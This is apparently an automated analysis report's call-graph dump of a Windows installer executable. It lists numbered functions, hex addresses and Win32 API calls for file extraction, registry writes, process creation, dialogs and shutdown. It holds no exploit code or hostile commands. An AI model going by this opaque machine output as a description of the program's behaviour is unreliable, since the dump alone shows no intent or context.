API calls 4052->4055 4057 403423 4054->4057 4058 40342e 4054->4058 4059 4034e6 4055->4059 4208 405b98 lstrcpynA 4057->4208 4209 405b98 lstrcpynA 4058->4209 4062 405ec3 3 API calls 4059->4062 4071 4034ef 4062->4071 4064 4033a6 4196 405b98 lstrcpynA 4064->4196 4065 405bba 18 API calls 4069 40346d DeleteFileA 4065->4069 4066 40353d ExitWindowsEx 4066->4045 4070 40354a 4066->4070 4126 403643 4068->4126 4072 40347a CopyFileA 4069->4072 4080 40343c 4069->4080 4073 40140b 2 API calls 4070->4073 4071->4066 4074 4034fd GetCurrentProcess 4071->4074 4072->4080 4073->4045 4077 40350d 4074->4077 4075 4034c2 4078 405a4c 40 API calls 4075->4078 4077->4066 4078->4079 4197 403569 4079->4197 4080->4065 4080->4075 4081 405bba 18 API calls 4080->4081 4083 4034ae CloseHandle 4080->4083 4210 405a4c 4080->4210 4215 405368 CreateProcessA 4080->4215 4081->4080 4083->4080 4085 405eea GetProcAddress 4084->4085 4086 405edf LoadLibraryA 4084->4086 4087 403150 SHGetFileInfoA 4085->4087 4086->4085 4086->4087 4088 405b98 lstrcpynA 4087->4088 4088->4015 4089->4017 4091 405e03 5 API calls 4090->4091 4092 4030e3 4091->4092 4093 4030ed 4092->4093 4218 405645 lstrlenA CharPrevA 4092->4218 4093->4024 4225 405846 GetFileAttributesA CreateFileA 4098->4225 4100 402c73 4125 402c83 4100->4125 4226 405b98 lstrcpynA 4100->4226 4102 402c99 4227 40568c lstrlenA 4102->4227 4106 402caa GetFileSize 4121 402da6 4106->4121 4124 402cc1 4106->4124 4108 402daf 4110 402ddf GlobalAlloc 4108->4110 4108->4125 4245 4030c0 SetFilePointer 4108->4245 4246 4030c0 SetFilePointer 4110->4246 4112 402e12 4114 402bcf 6 API calls 4112->4114 4114->4125 4115 402dc8 4118 40308e ReadFile 4115->4118 4116 402dfa 4247 402e6c 4116->4247 4119 402dd3 4118->4119 4119->4110 4119->4125 4120 402bcf 6 API calls 4120->4124 4234 402bcf 4121->4234 4122 402e06 4122->4122 4123 402e43 SetFilePointer 4122->4123 4122->4125 4123->4125 4124->4112 4124->4120 4124->4121 4124->4125 4232 40308e ReadFile 4124->4232 4125->4031 4127 405ec3 3 API calls 4126->4127 4128 403657 4127->4128 4129 40365d GetUserDefaultUILanguage 4128->4129 4130 40366f 4128->4130 4273 405af6 wsprintfA 4129->4273 4132 405a7f 3 API calls 4130->4132 4134 40369a 4132->4134 4133 40366d 4274 403908 4133->4274 4135 4036b8 lstrcatA 4134->4135 4136 405a7f 3 API calls 4134->4136 4135->4133 4136->4135 4139 405733 18 API calls 4140 4036ea 4139->4140 4141 403773 4140->4141 4143 405a7f 3 API calls 4140->4143 4142 405733 18 API calls 4141->4142 4144 403779 4142->4144 4145 403716 4143->4145 4146 403789 LoadImageA 4144->4146 4147 405bba 18 API calls 4144->4147 4145->4141 4150 403732 lstrlenA 4145->4150 4154 405670 CharNextA 4145->4154 4148 4037b0 RegisterClassA 4146->4148 4149 40382f 4146->4149 4147->4146 4151 4037e6 SystemParametersInfoA CreateWindowExA 4148->4151 4152 403839 4148->4152 4153 40140b 2 API calls 4149->4153 4155 403740 lstrcmpiA 4150->4155 4156 403766 4150->4156 4151->4149 4152->4079 4157 403835 4153->4157 4159 403730 4154->4159 4155->4156 4160 403750 GetFileAttributesA 4155->4160 4158 405645 3 API calls 4156->4158 4157->4152 4161 403908 19 API calls 4157->4161 4162 40376c 4158->4162 4159->4150 4163 40375c 4160->4163 4165 403846 4161->4165 4283 405b98 lstrcpynA 4162->4283 4163->4156 4164 40568c 2 API calls 4163->4164 4164->4156 4167 403852 ShowWindow LoadLibraryA 4165->4167 4168 4038d5 4165->4168 4169 403871 LoadLibraryA 4167->4169 4170 403878 GetClassInfoA 4167->4170 4284 404f77 OleInitialize 4168->4284 4169->4170 4172 4038a2 DialogBoxParamA 4170->4172 4173 40388c GetClassInfoA RegisterClassA 4170->4173 4177 40140b 2 API calls 4172->4177 4173->4172 4174 4038db 4175 4038f7 4174->4175 4176 4038df 4174->4176 4178 40140b 2 API calls 4175->4178 4176->4152 4179 40140b 2 API calls 4176->4179 4177->4152 4178->4152 4179->4152 4180->4022 4295 405b98 lstrcpynA 4181->4295 4183 405744 4296 4056de CharNextA CharNextA 4183->4296 4185 403397 4185->4079 4195 405b98 lstrcpynA 4185->4195 4187 405e03 5 API calls 4193 40575a 4187->4193 4188 405785 lstrlenA 4189 405790 4188->4189 4188->4193 4191 405645 3 API calls 4189->4191 4192 405795 GetFileAttributesA 4191->4192 4192->4185 4193->4185 4193->4188 4194 40568c 2 API calls 4193->4194 4302 405e9c FindFirstFileA 4193->4302 4194->4188 4195->4064 4196->4068 4198 403581 4197->4198 4199 403573 CloseHandle 4197->4199 4305 4035ae 4198->4305 4199->4198 4205 4053de 4204->4205 4206 4033e8 ExitProcess 4205->4206 4207 4053f2 MessageBoxIndirectA 4205->4207 4207->4206 4208->4058 4209->4080 4211 405ec3 3 API calls 4210->4211 4212 405a53 4211->4212 4214 405a74 4212->4214 4362 4058be lstrcpyA 4212->4362 4214->4080 4216 4053a3 4215->4216 4217 405397 CloseHandle 4215->4217 4216->4080 4217->4216 4219 4030f5 CreateDirectoryA 4218->4219 4220 40565f lstrcatA 4218->4220 4221 405875 4219->4221 4220->4219 4222 405880 GetTickCount GetTempFileNameA 4221->4222 4223 403109 4222->4223 4224 4058ad 4222->4224 4223->4024 4224->4222 4224->4223 4225->4100 4226->4102 4228 405699 4227->4228 4229 402c9f 4228->4229 4230 40569e CharPrevA 4228->4230 4231 405b98 lstrcpynA 4229->4231 4230->4228 4230->4229 4231->4106 4233 4030af 4232->4233 4233->4124 4235 402bf0 4234->4235 4236 402bd8 4234->4236 4239 402c00 GetTickCount 4235->4239 4240 402bf8 4235->4240 4237 402be1 DestroyWindow 4236->4237 4238 402be8 4236->4238 4237->4238 4238->4108 4242 402c31 4239->4242 4243 402c0e CreateDialogParamA ShowWindow 4239->4243 4268 405efc 4240->4268 4242->4108 4243->4242 4245->4115 4246->4116 4249 402e82 4247->4249 4248 402eb0 4250 40308e ReadFile 4248->4250 4249->4248 4272 4030c0 SetFilePointer 4249->4272 4252 402ebb 4250->4252 4253 403022 4252->4253 4254 402ecd GetTickCount 4252->4254 4259 40300d 4252->4259 4255 403026 4253->4255 4256 40303e 4253->4256 4254->4259 4267 402f1c 4254->4267 4257 40308e ReadFile 4255->4257 4256->4259 4260 40308e ReadFile 4256->4260 4261 403059 WriteFile 4256->4261 4257->4259 4258 40308e ReadFile 4258->4267 4259->4122 4260->4256 4261->4259 4262 40306e 4261->4262 4262->4256 4262->4259 4263 402f72 GetTickCount 4263->4267 4264 402f97 MulDiv wsprintfA 4265 404ea5 25 API calls 4264->4265 4265->4267 4266 402fd5 WriteFile 4266->4259 4266->4267 4267->4258 4267->4259 4267->4263 4267->4264 4267->4266 4269 405f19 PeekMessageA 4268->4269 4270 402bfe 4269->4270 4271 405f0f DispatchMessageA 4269->4271 4270->4108 4271->4269 4272->4248 4273->4133 4275 40391c 4274->4275 4291 405af6 wsprintfA 4275->4291 4277 40398d 4278 405bba 18 API calls 4277->4278 4279 403999 SetWindowTextA 4278->4279 4280 4036c8 4279->4280 4281 4039b5 4279->4281 4280->4139 4281->4280 4282 405bba 18 API calls 4281->4282 4282->4281 4283->4141 4292 403ef4 4284->4292 4286 404fc1 4287 403ef4 SendMessageA 4286->4287 4288 404fd3 OleUninitialize 4287->4288 4288->4174 4289 404f9a 4289->4286 4290 401389 2 API calls 4289->4290 4290->4289 4291->4277 4293 403f0c 4292->4293 4294 403efd SendMessageA 4292->4294 4293->4289 4294->4293 4295->4183 4297 4056f9 4296->4297 4300 405709 4296->4300 4298 405704 CharNextA 4297->4298 4297->4300 4301 405729 4298->4301 4299 405670 CharNextA 4299->4300 4300->4299 4300->4301 4301->4185 4301->4187 4303 405eb2 FindClose 4302->4303 4304 405ebd 4302->4304 4303->4304 4304->4193 4306 4035bc 4305->4306 4307 403586 4306->4307 4308 4035c1 FreeLibrary GlobalFree 4306->4308 4309 405475 4307->4309 4308->4307 4308->4308 4310 405733 18 API calls 4309->4310 4311 405495 4310->4311 4312 4054b4 4311->4312 4313 40549d DeleteFileA 4311->4313 4315 4055e2 4312->4315 4349 405b98 lstrcpynA 4312->4349 4314 4033ca OleUninitialize 4313->4314 4314->4043 4314->4044 4315->4314 4320 405e9c 2 API calls 4315->4320 4317 4054da 4318 4054e0 lstrcatA 4317->4318 4319 4054ed 4317->4319 4321 4054f3 4318->4321 4322 40568c 2 API calls 4319->4322 4323 405606 4320->4323 4324 405501 lstrcatA 4321->4324 4325 40550c lstrlenA FindFirstFileA 4321->4325 4322->4321 4323->4314 4326 40560a 4323->4326 4324->4325 4325->4315 4327 405530 4325->4327 4328 405645 3 API calls 4326->4328 4329 405670 CharNextA 4327->4329 4336 4055c1 FindNextFileA 4327->4336 4345 405582 4327->4345 4350 405b98 lstrcpynA 4327->4350 4330 405610 4328->4330 4329->4327 4331 40542d 5 API calls 4330->4331 4332 40561c 4331->4332 4333 405620 4332->4333 4334 405636 4332->4334 4333->4314 4339 404ea5 25 API calls 4333->4339 4335 404ea5 25 API calls 4334->4335 4335->4314 4336->4327 4338 4055d9 FindClose 4336->4338 4338->4315 4340 40562d 4339->4340 4341 405a4c 40 API calls 4340->4341 4344 405634 4341->4344 4343 405475 64 API calls 4343->4345 4344->4314 4345->4336 4345->4343 4346 404ea5 25 API calls 4345->4346 4347 404ea5 25 API calls 4345->4347 4348 405a4c 40 API calls 4345->4348 4351 40542d 4345->4351 4346->4336 4347->4345 4348->4345 4349->4317 4350->4327 4359 405821 GetFileAttributesA 4351->4359 4354 40545a 4354->4345 4355 405450 DeleteFileA 4357 405456 4355->4357 4356 405448 RemoveDirectoryA 4356->4357 4357->4354 4358 405466 SetFileAttributesA 4357->4358 4358->4354 4360 405439 4359->4360 4361 405833 SetFileAttributesA 4359->4361 4360->4354 4360->4355 4360->4356 4361->4360 4363 4058e7 4362->4363 4364 40590d GetShortPathNameA 4362->4364 4386 405846 GetFileAttributesA CreateFileA 4363->4386 4365 405922 4364->4365 4366 405a46 4364->4366 4365->4366 4368 40592a wsprintfA 4365->4368 4366->4214 4371 405bba 18 API calls 4368->4371 4369 4058f1 CloseHandle GetShortPathNameA 4369->4366 4370 405905 4369->4370 4370->4364 4370->4366 4372 405952 4371->4372 4387 405846 GetFileAttributesA CreateFileA 4372->4387 4374 40595f 4374->4366 4375 40596e GetFileSize GlobalAlloc 4374->4375 4376 405990 ReadFile 4375->4376 4377 405a3f CloseHandle 4375->4377 4376->4377 4378 4059a8 4376->4378 4377->4366 4378->4377 4388 4057ab lstrlenA 4378->4388 4381 4059c1 lstrcpyA 4385 4059e3 4381->4385 4382 4059d5 4383 4057ab 4 API calls 4382->4383 4383->4385 4384 405a1a SetFilePointer WriteFile GlobalFree 4384->4377 4385->4384 4386->4369 4387->4374 4389 4057ec lstrlenA 4388->4389 4390 4057f4 4389->4390 4391 4057c5 lstrcmpiA 4389->4391 4390->4381 4390->4382 4391->4390 4392 4057e3 CharNextA 4391->4392 4392->4389 5079 40260c 5080 402613 5079->5080 5081 40289c 5079->5081 5082 402619 FindClose 5080->5082 5082->5081 5083 40268d 5084 402a07 18 API calls 5083->5084 5086 40269b 5084->5086 5085 4026b1 5088 405821 2 API calls 5085->5088 5086->5085 5087 402a07 18 API calls 5086->5087 5087->5085 5089 4026b7 5088->5089 5109 405846 GetFileAttributesA CreateFileA 5089->5109 5091 4026c4 5092 4026d0 GlobalAlloc 5091->5092 5093 40276d 5091->5093 5094 402764 CloseHandle 5092->5094 5095 4026e9 5092->5095 5096 402775 DeleteFileA 5093->5096 5097 402788 5093->5097 5094->5093 5110 4030c0 SetFilePointer 5095->5110 5096->5097 5099 4026ef 5100 40308e ReadFile 5099->5100 5101 4026f8 GlobalAlloc 5100->5101 5102 402708 5101->5102 5103 40273c WriteFile GlobalFree 5101->5103 5105 402e6c 33 API calls 5102->5105 5104 402e6c 33 API calls 5103->5104 5106 402761 5104->5106 5108 402715 5105->5108 5106->5094 5107 402733 GlobalFree 5107->5103 5108->5107 5109->5091 5110->5099 5111 40278e 5112 4029ea 18 API calls 5111->5112 5113 402794 5112->5113 5114 4027b8 5113->5114 5115 4027cf 5113->5115 5118 40266d 5113->5118 5119 4027bd 5114->5119 5120 4027cc 5114->5120 5116 4027e5 5115->5116 5117 4027d9 5115->5117 5122 405bba 18 API calls 5116->5122 5121 4029ea 18 API calls 5117->5121 5125 405b98 lstrcpynA 5119->5125 5120->5118 5126 405af6 wsprintfA 5120->5126 5121->5120 5122->5120 5125->5118 5126->5118 5127 401490 5128 404ea5 25 API calls 5127->5128 5129 401497 5128->5129 5130 100015d0 5131 100014d8 4 API calls 5130->5131 5133 100015e8 5131->5133 5132 1000162e GlobalFree 5133->5132 5134 10001603 5133->5134 5135 1000161a VirtualFree 5133->5135 5134->5132 5135->5132 4410 401b11 4411 401b62 4410->4411 4412 401b1e 4410->4412 4414 401b66 4411->4414 4415 401b8b GlobalAlloc 4411->4415 4413 401ba6 4412->4413 4420 401b35 4412->4420 4416 405bba 18 API calls 4413->4416 4424 402224 4413->4424 4414->4424 4431 405b98 lstrcpynA 4414->4431 4417 405bba 18 API calls 4415->4417 4419 40221e 4416->4419 4417->4413 4423 4053c9 MessageBoxIndirectA 4419->4423 4429 405b98 lstrcpynA 4420->4429 4421 401b78 GlobalFree 4421->4424 4423->4424 4425 401b44 4430 405b98 lstrcpynA 4425->4430 4427 401b53 4432 405b98 lstrcpynA 4427->4432 4429->4425 4430->4427 4431->4421 4432->4424 5136 402814 5137 4029ea 18 API calls 5136->5137 5138 40281a 5137->5138 5139 40284b 5138->5139 5140 40266d 5138->5140 5142 402828 5138->5142 5139->5140 5141 405bba 18 API calls 5139->5141 5141->5140 5142->5140 5144 405af6 wsprintfA 5142->5144 5144->5140 4552 401595 4553 402a07 18 API calls 4552->4553 4554 40159c SetFileAttributesA 4553->4554 4555 4015ae 4554->4555 5145 401c95 5146 4029ea 18 API calls 5145->5146 5147 401c9c 5146->5147 5148 4029ea 18 API calls 5147->5148 5149 401ca4 GetDlgItem 5148->5149 5150 4024c9 5149->5150 4561 402517 4562 4029ea 18 API calls 4561->4562 4564 402521 4562->4564 4563 402597 4564->4563 4565 402555 ReadFile 4564->4565 4566 402599 4564->4566 4567 4025a9 4564->4567 4565->4563 4565->4564 4570 405af6 wsprintfA 4566->4570 4567->4563 4569 4025bf SetFilePointer 4567->4569 4569->4563 4570->4563 5151 10001058 5152 1000123b 3 API calls 5151->5152 5154 10001074 5152->5154 5153 100010dc 5154->5153 5155 10001091 5154->5155 5156 100014d8 4 API calls 5154->5156 5157 100014d8 4 API calls 5155->5157 5156->5155 5158 100010a1 5157->5158 5159 100010b1 5158->5159 5160 100010a8 GlobalSize 5158->5160 5161 100010b5 GlobalAlloc 5159->5161 5162 100010c6 5159->5162 5160->5159 5163 100014ff 3 API calls 5161->5163 5164 100010d1 GlobalFree 5162->5164 5163->5162 5164->5153 4588 404e19 4589 404e29 4588->4589 4590 404e3d 4588->4590 4592 404e86 4589->4592 4593 404e2f 4589->4593 4591 404e45 IsWindowVisible 4590->4591 4600 404e65 4590->4600 4591->4592 4595 404e52 4591->4595 4596 404e8b CallWindowProcA 4592->4596 4594 403ef4 SendMessageA 4593->4594 4597 404e39 4594->4597 4598 404770 5 API calls 4595->4598 4596->4597 4599 404e5c 4598->4599 4599->4600 4600->4596 4601 4047f0 4 API calls 4600->4601 4601->4592 4612 40231a 4613 402320 4612->4613 4614 402a07 18 API calls 4613->4614 4615 402332 4614->4615 4616 402a07 18 API calls 4615->4616 4617 40233c RegCreateKeyExA 4616->4617 4618 402366 4617->4618 4621 40266d 4617->4621 4619 40237e 4618->4619 4620 402a07 18 API calls 4618->4620 4623 4029ea 18 API calls 4619->4623 4625 40238a 4619->4625 4622 402377 lstrlenA 4620->4622 4622->4619 4623->4625 4624 4023a5 RegSetValueExA 4627 4023bb RegCloseKey 4624->4627 4625->4624 4626 402e6c 33 API calls 4625->4626 4626->4624 4627->4621 5165 40429f 5166 4042d5 5165->5166 5167 4042af 5165->5167 5169 403f0f 8 API calls 5166->5169 5168 403ea8 19 API calls 5167->5168 5170 4042bc SetDlgItemTextA 5168->5170 5171 4042e1 5169->5171 5170->5166 5172 100010e0 5173 1000110e 5172->5173 5174 1000123b 3 API calls 5173->5174 5178 1000111e 5174->5178 5175 100011c4 GlobalFree 5176 100012bf 2 API calls 5176->5178 5177 100011c3 5177->5175 5178->5175 5178->5176 5178->5177 5179 1000123b 3 API calls 5178->5179 5180 10001278 2 API calls 5178->5180 5181 10001155 GlobalAlloc 5178->5181 5182 100011ea GlobalFree 5178->5182 5183 100011b1 GlobalFree 5178->5183 5184 100012e8 lstrcpyA 5178->5184 5179->5178 5180->5183 5181->5178 5182->5178 5183->5178 5184->5178 5185 4016a1 5186 402a07 18 API calls 5185->5186 5187 4016a7 GetFullPathNameA 5186->5187 5188 4016be 5187->5188 5194 4016df 5187->5194 5191 405e9c 2 API calls 5188->5191 5188->5194 5189 4016f3 GetShortPathNameA 5190 40289c 5189->5190 5192 4016cf 5191->5192 5192->5194 5195 405b98 lstrcpynA 5192->5195 5194->5189 5194->5190 5195->5194 3637 404822 GetDlgItem GetDlgItem 3638 404874 7 API calls 3637->3638 3653 404a8c 3637->3653 3639 404917 DeleteObject 3638->3639 3640 40490a SendMessageA 3638->3640 3641 404920 3639->3641 3640->3639 3643 404957 3641->3643 3692 405bba 3641->3692 3642 404b70 3645 404c1c 3642->3645 3649 404e04 3642->3649 3657 404bc9 SendMessageA 3642->3657 3710 403ea8 3643->3710 3650 404c26 SendMessageA 3645->3650 3651 404c2e 3645->3651 3647 404b51 3647->3642 3659 404b62 SendMessageA 3647->3659 3648 40496b 3656 403ea8 19 API calls 3648->3656 3737 403f0f 3649->3737 3650->3651 3660 404c40 ImageList_Destroy 3651->3660 3661 404c47 3651->3661 3669 404c57 3651->3669 3653->3642 3653->3647 3654 404aec 3653->3654 3715 404770 SendMessageA 3654->3715 3672 404979 3656->3672 3657->3649 3663 404bde SendMessageA 3657->3663 3659->3642 3660->3661 3665 404c50 GlobalFree 3661->3665 3661->3669 3662 404dc6 3662->3649 3670 404dd8 ShowWindow GetDlgItem ShowWindow 3662->3670 3667 404bf1 3663->3667 3665->3669 3666 404a4d GetWindowLongA SetWindowLongA 3671 404a66 3666->3671 3678 404c02 SendMessageA 3667->3678 3668 404afd 3668->3647 3669->3662 3687 404c92 3669->3687 3720 4047f0 3669->3720 3670->3649 3673 404a84 3671->3673 3674 404a6c ShowWindow 3671->3674 3672->3666 3677 4049c8 SendMessageA 3672->3677 3679 404a47 3672->3679 3680 404a04 SendMessageA 3672->3680 3681 404a15 SendMessageA 3672->3681 3714 403edd SendMessageA 3673->3714 3713 403edd SendMessageA 3674->3713 3677->3672 3678->3645 3679->3666 3679->3671 3680->3672 3681->3672 3683 404a7f 3683->3649 3684 404d9c InvalidateRect 3684->3662 3685 404db2 3684->3685 3729 40468e 3685->3729 3686 404cc0 SendMessageA 3690 404cd6 3686->3690 3687->3686 3687->3690 3689 404d37 3691 404d4a SendMessageA SendMessageA 3689->3691 3690->3684 3690->3689 3690->3691 3691->3690 3708 405bc7 3692->3708 3693 405dea 3694 404939 SendMessageA SendMessageA 3693->3694 3767 405b98 lstrcpynA 3693->3767 3694->3641 3696 405c68 GetVersion 3696->3708 3697 405dc1 lstrlenA 3697->3708 3698 405bba 10 API calls 3698->3697 3701 405ce0 GetSystemDirectoryA 3701->3708 3703 405cf3 GetWindowsDirectoryA 3703->3708 3705 405bba 10 API calls 3705->3708 3706 405d6a lstrcatA 3706->3708 3707 405d27 SHGetSpecialFolderLocation 3707->3708 3709 405d3f SHGetPathFromIDListA CoTaskMemFree 3707->3709 3708->3693 3708->3696 3708->3697 3708->3698 3708->3701 3708->3703 3708->3705 3708->3706 3708->3707 3751 405a7f RegOpenKeyExA 3708->3751 3756 405e03 3708->3756 3765 405af6 wsprintfA 3708->3765 3766 405b98 lstrcpynA 3708->3766 3709->3708 3711 405bba 18 API calls 3710->3711 3712 403eb3 SetDlgItemTextA 3711->3712 3712->3648 3713->3683 3714->3653 3716 404793 GetMessagePos ScreenToClient SendMessageA 3715->3716 3717 4047cf SendMessageA 3715->3717 3718 4047c7 3716->3718 3719 4047cc 3716->3719 3717->3718 3718->3668 3719->3717 3772 405b98 lstrcpynA 3720->3772 3722 404803 3773 405af6 wsprintfA 3722->3773 3724 40480d 3774 40140b 3724->3774 3728 40481d 3728->3687 3730 4046a8 3729->3730 3731 405bba 18 API calls 3730->3731 3732 4046dd 3731->3732 3733 405bba 18 API calls 3732->3733 3734 4046e8 3733->3734 3735 405bba 18 API calls 3734->3735 3736 404719 lstrlenA wsprintfA SetDlgItemTextA 3735->3736 3736->3662 3738 403f27 GetWindowLongA 3737->3738 3748 403fb0 3737->3748 3739 403f38 3738->3739 3738->3748 3740 403f47 GetSysColor 3739->3740 3741 403f4a 3739->3741 3740->3741 3742 403f50 SetTextColor 3741->3742 3743 403f5a SetBkMode 3741->3743 3742->3743 3744 403f72 GetSysColor 3743->3744 3745 403f78 3743->3745 3744->3745 3746 403f89 3745->3746 3747 403f7f SetBkColor 3745->3747 3746->3748 3749 403fa3 CreateBrushIndirect 3746->3749 3750 403f9c DeleteObject 3746->3750 3747->3746 3749->3748 3750->3749 3752 405af0 3751->3752 3753 405ab2 RegQueryValueExA 3751->3753 3752->3708 3754 405ad3 RegCloseKey 3753->3754 3754->3752 3763 405e0f 3756->3763 3757 405e77 3758 405e7b CharPrevA 3757->3758 3760 405e96 3757->3760 3758->3757 3759 405e6c CharNextA 3759->3757 3759->3763 3760->3708 3762 405e5a CharNextA 3762->3763 3763->3757 3763->3759 3763->3762 3764 405e67 CharNextA 3763->3764 3768 405670 3763->3768 3764->3759 3765->3708 3766->3708 3767->3694 3769 405676 3768->3769 3770 405689 3769->3770 3771 40567c CharNextA 3769->3771 3770->3763 3771->3769 3772->3722 3773->3724 3778 401389 3774->3778 3777 405b98 lstrcpynA 3777->3728 3780 401390 3778->3780 3779 4013fe 3779->3777 3780->3779 3781 4013cb MulDiv SendMessageA 3780->3781 3781->3780 5196 402626 5197 402629 5196->5197 5198 402641 5196->5198 5200 402636 FindNextFileA 5197->5200 5199 4027c7 5198->5199 5202 405b98 lstrcpynA 5198->5202 5200->5198 5202->5199 5203 401d26 GetDC GetDeviceCaps 5204 4029ea 18 API calls 5203->5204 5205 401d44 MulDiv ReleaseDC 5204->5205 5206 4029ea 18 API calls 5205->5206 5207 401d63 5206->5207 5208 405bba 18 API calls 5207->5208 5209 401d9c CreateFontIndirectA 5208->5209 5210 4024c9 5209->5210 5211 404628 5212 404654 5211->5212 5213 404638 5211->5213 5215 404687 5212->5215 5216 40465a SHGetPathFromIDListA 5212->5216 5222 4053ad GetDlgItemTextA 5213->5222 5218 40466a 5216->5218 5221 404671 SendMessageA 5216->5221 5217 404645 SendMessageA 5217->5212 5220 40140b 2 API calls 5218->5220 5220->5221 5221->5215 5222->5217 4393 40172c 4394 402a07 18 API calls 4393->4394 4395 401733 4394->4395 4396 405875 2 API calls 4395->4396 4397 40173a 4396->4397 4398 405875 2 API calls 4397->4398 4398->4397 4399 401dac 4407 4029ea 4399->4407 4401 401db2 4402 4029ea 18 API calls 4401->4402 4403 401dbb 4402->4403 4404 401dc2 ShowWindow 4403->4404 4405 401dcd EnableWindow 4403->4405 4406 40289c 4404->4406 4405->4406 4408 405bba 18 API calls 4407->4408 4409 4029fe 4408->4409 4409->4401 5223 401eac 5224 402a07 18 API calls 5223->5224 5225 401eb3 5224->5225 5226 405e9c 2 API calls 5225->5226 5227 401eb9 5226->5227 5229 401ecb 5227->5229 5230 405af6 wsprintfA 5227->5230 5230->5229 5231 40192d 5232 402a07 18 API calls 5231->5232 5233 401934 lstrlenA 5232->5233 5234 4024c9 5233->5234 5235 4024ad 5236 402a07 18 API calls 5235->5236 5237 4024b4 5236->5237 5240 405846 GetFileAttributesA CreateFileA 5237->5240 5239 4024c0 5240->5239 5241 401cb0 5242 4029ea 18 API calls 5241->5242 5243 401cc0 SetWindowLongA 5242->5243 5244 40289c 5243->5244 5245 401a31 5246 4029ea 18 API calls 5245->5246 5247 401a37 5246->5247 5248 4029ea 18 API calls 5247->5248 5249 4019e1 5248->5249 4439 401e32 4440 402a07 18 API calls 4439->4440 4441 401e38 4440->4441 4442 404ea5 25 API calls 4441->4442 4443 401e42 4442->4443 4444 405368 2 API calls 4443->4444 4448 401e48 4444->4448 4445 401e9e CloseHandle 4447 40266d 4445->4447 4446 401e67 WaitForSingleObject 4446->4448 4449 401e75 GetExitCodeProcess 4446->4449 4448->4445 4448->4446 4448->4447 4450 405efc 2 API calls 4448->4450 4451 401e92 4449->4451 4452 401e87 4449->4452 4450->4446 4451->4445 4454 401e90 4451->4454 4455 405af6 wsprintfA 4452->4455 4454->4445 4455->4454 4456 4015b3 4457 402a07 18 API calls 4456->4457 4458 4015ba 4457->4458 4459 4056de 4 API calls 4458->4459 4470 4015c2 4459->4470 4460 40160a 4462 401638 4460->4462 4463 40160f 4460->4463 4461 405670 CharNextA 4464 4015d0 CreateDirectoryA 4461->4464 4467 401423 25 API calls 4462->4467 4465 401423 25 API calls 4463->4465 4466 4015e5 GetLastError 4464->4466 4464->4470 4468 401616 4465->4468 4469 4015f2 GetFileAttributesA 4466->4469 4466->4470 4473 401630 4467->4473 4474 405b98 lstrcpynA 4468->4474 4469->4470 4470->4460 4470->4461 4472 401621 SetCurrentDirectoryA 4472->4473 4474->4472 5250 402036 5251 402a07 18 API calls 5250->5251 5252 40203d 5251->5252 5253 402a07 18 API calls 5252->5253 5254 402047 5253->5254 5255 402a07 18 API calls 5254->5255 5256 402050 5255->5256 5257 402a07 18 API calls 5256->5257 5258 40205a 5257->5258 5259 402a07 18 API calls 5258->5259 5260 402064 5259->5260 5261 402078 CoCreateInstance 5260->5261 5262 402a07 18 API calls 5260->5262 5265 402097 5261->5265 5266 40214d 5261->5266 5262->5261 5263 401423 25 API calls 5264 40217f 5263->5264 5265->5266 5267 40212c MultiByteToWideChar 5265->5267 5266->5263 5266->5264 5267->5266 5268 10002977 5269 1000298f 5268->5269 5270 10001551 2 API calls 5269->5270 5271 100029aa 5270->5271 5272 4014b7 5273 4014bd 5272->5273 5274 401389 2 API calls 5273->5274 5275 4014c5 5274->5275 4577 402438 4578 402b11 19 API calls 4577->4578 4579 402442 4578->4579 4580 4029ea 18 API calls 4579->4580 4581 40244b 4580->4581 4582 402455 4581->4582 4585 40266d 4581->4585 4583 402462 RegEnumKeyA 4582->4583 4584 40246e RegEnumValueA 4582->4584 4586 402487 RegCloseKey 4583->4586 4584->4585 4584->4586 4586->4585 5276 401bb8 5277 4029ea 18 API calls 5276->5277 5278 401bbf 5277->5278 5279 4029ea 18 API calls 5278->5279 5280 401bc9 5279->5280 5281 402a07 18 API calls 5280->5281 5283 401bd9 5280->5283 5281->5283 5282 401be9 5285 401bf4 5282->5285 5286 401c38 5282->5286 5283->5282 5284 402a07 18 API calls 5283->5284 5284->5282 5288 4029ea 18 API calls 5285->5288 5287 402a07 18 API calls 5286->5287 5289 401c3d 5287->5289 5290 401bf9 5288->5290 5292 402a07 18 API calls 5289->5292 5291 4029ea 18 API calls 5290->5291 5293 401c02 5291->5293 5294 401c46 FindWindowExA 5292->5294 5295 401c28 SendMessageA 5293->5295 5296 401c0a SendMessageTimeoutA 5293->5296 5297 401c64 5294->5297 5295->5297 5296->5297 4602 402239 4603 402241 4602->4603 4604 402247 4602->4604 4605 402a07 18 API calls 4603->4605 4606 402a07 18 API calls 4604->4606 4607 402257 4604->4607 4605->4604 4606->4607 4608 402a07 18 API calls 4607->4608 4610 402265 4607->4610 4608->4610 4609 402a07 18 API calls 4611 40226e WritePrivateProfileStringA 4609->4611 4610->4609 5298 403fbc lstrcpynA lstrlenA 4638 4022be 4639 4022c3 4638->4639 4640 4022ee 4638->4640 4642 402b11 19 API calls 4639->4642 4641 402a07 18 API calls 4640->4641 4643 4022f5 4641->4643 4644 4022ca 4642->4644 4650 402a47 RegOpenKeyExA 4643->4650 4645 4022d4 4644->4645 4649 40230b 4644->4649 4646 402a07 18 API calls 4645->4646 4647 4022db RegDeleteValueA RegCloseKey 4646->4647 4647->4649 4651 402adb 4650->4651 4654 402a72 4650->4654 4651->4649 4652 402a98 RegEnumKeyA 4653 402aaa RegCloseKey 4652->4653 4652->4654 4655 405ec3 3 API calls 4653->4655 4654->4652 4654->4653 4656 402acf RegCloseKey 4654->4656 4657 402a47 3 API calls 4654->4657 4658 402aba 4655->4658 4659 402abe 4656->4659 4657->4654 4658->4659 4660 402aea RegDeleteKeyA 4658->4660 4659->4651 4660->4659 4661 40173f 4662 402a07 18 API calls 4661->4662 4663 401746 4662->4663 4664 401764 4663->4664 4665 40176c 4663->4665 4700 405b98 lstrcpynA 4664->4700 4701 405b98 lstrcpynA 4665->4701 4668 40176a 4672 405e03 5 API calls 4668->4672 4669 401777 4670 405645 3 API calls 4669->4670 4671 40177d lstrcatA 4670->4671 4671->4668 4684 401789 4672->4684 4673 405e9c 2 API calls 4673->4684 4674 405821 2 API calls 4674->4684 4676 4017a0 CompareFileTime 4676->4684 4677 401864 4678 404ea5 25 API calls 4677->4678 4680 40186e 4678->4680 4679 404ea5 25 API calls 4689 401850 4679->4689 4681 402e6c 33 API calls 4680->4681 4683 401881 4681->4683 4682 405b98 lstrcpynA 4682->4684 4685 401895 SetFileTime 4683->4685 4687 4018a7 FindCloseChangeNotification 4683->4687 4684->4673 4684->4674 